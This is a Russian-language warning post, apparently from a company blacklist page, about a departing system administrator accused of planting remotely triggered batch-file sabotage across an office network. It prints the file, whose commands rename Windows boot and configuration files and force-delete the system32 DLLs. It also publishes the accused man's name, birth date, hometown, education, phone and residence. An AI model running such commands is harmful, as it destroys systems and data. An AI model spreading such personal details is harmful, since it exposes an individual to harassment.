- осторожно

- осторожно!
Опасный системный администратор

  Если Вам доводилось обращаться за помощью к системному администратору , будьте осторожны. Вполне вероятно, что помимо заказанных Вами услуг (ремонта компьютера или сервера, установки домашней или офисной сети, подключения к Интернету, установки Windows или других программ на Вашем компьютере) на Ваши компьютеры были заложены специальные программы «закладки», позволяющие из вне через Интернет зайти в Ваш компьютер или сеть и вывести их из строя. Активированные закладки практически не оставляют следов, и внешне, не квалифицированному специалисту, все может показаться как штатная поломка компьютера или сети. Вполне вероятно, что после активации такой закладки Вам со стороны автора закладки предложат исправить ситуацию, естественно, за отдельное вознаграждение. Либо Вы сами к нему обратитесь, если он уже взял Вас на абонентское обслуживание.

  Так произошло и у нас. В центральном офисе у нас была установлена сеть, состоящая из 4 серверов и 40 компьютеров. Системный администратор ее администрировал. В какой-то момент он принял решение об увольнении, и буквально на следующее утро после его ухода у нас начали происходить неприятности.

В начале в установленной у нас системе учета посещаемости «Кард-он» вместо привычных «welcome» или «good bye», приходящие сотрудники услышали какие-то ругательные изречения «от Масяни», после чего программа вышла из строя.

Дальше начались более серьезные неприятности. За пару часов полностью вышли из строя, без возможности перезагрузки,  4 компьютера и 2 сервера, «рухнули» домен, SQL сервер, 1С, внешняя и внутренняя почта, ICQ, сетевой интернет, сетевые принтеры, управляемая сервером офисная мини-АТС и т. д.

Фактически в этот момент работа офиса была полностью парализована. Вызванный оперативно специалист из компьютерной «скорой помощи» компании Рабит системный администратор Альберт выяснил, что причиной всех наших неприятностей было проникновение из вне через Интернет злоумышленника, который активизировал на серверах и компьютерах заранее установленные «закладки».  Тут мы как раз и вспомнили, что прощаясь с , мы не позаботились о том, чтобы немедленно поменять все известные ему в порядке выполнения им своих служебных обязанностей пароли, включая и пароль для удаленного администрирования сети через Интернет, чем злоумышленник и воспользовался.

Закладками оказались простенькие, написанные системным администратором программки с названием 1.bat (см. приложение внизу), активизация которых через Интернет и привела к трагическим последствиям. Оперативная проверка всех компьютеров сети на предмет наличия закладок показало, что на 95% компьютеров сети и 100% серверов заложены такие же «мины».

Справочно:

родился 4 сентября 1980 года в г. Йошкар-Ола.
Образование: Марийский радиотехнический техникум, 1995 г.

Тел. 4-69 (телефон теперь м. б. другой). В настоящее время проживает в Балашихе.

Для специалистов приводим саму программу «закладку» Ситникова 1.bat:
ren c:\winnt\system. ini system. in
ren c:\winnt\win. ini win. in
ren c:\winnt\system32\ win. co
ren c:\ntldr ntldr1
ren c:\boot. ini
del c:\winnt\system32\*.dll /q /f

Нетрудно себе представить, чем грозит компьютеру или серверу активация данной «мины».

Резюме: низок и подл врач, не выполняющий клятву Гиппократа и принцип «не навреди». Низок и подл системный администратор, оставляющий и активирующий у клиента такие закладки.

P. S. Как выяснилось немного позднее, при инвентаризации компьютерной техники, системным администратором на сервере был несанкционированно снят блок пишущего DVD и заменен на дешевый CD-ROM. Также исчез дорогостоящий прибор для проверки сетей. Другие возможные подмены и "таинственные" исчезновения сейчас изучаются.
  Специалист по мини-АТС показал сознательно испорченный злоумышленником COM-порт. Штырьки в разъеме были специально подогнуты, после чего с силой вставлены в неправильное положение в гнездо. Ремонту не подлежит.

Источник: http://www. *****/blacklist/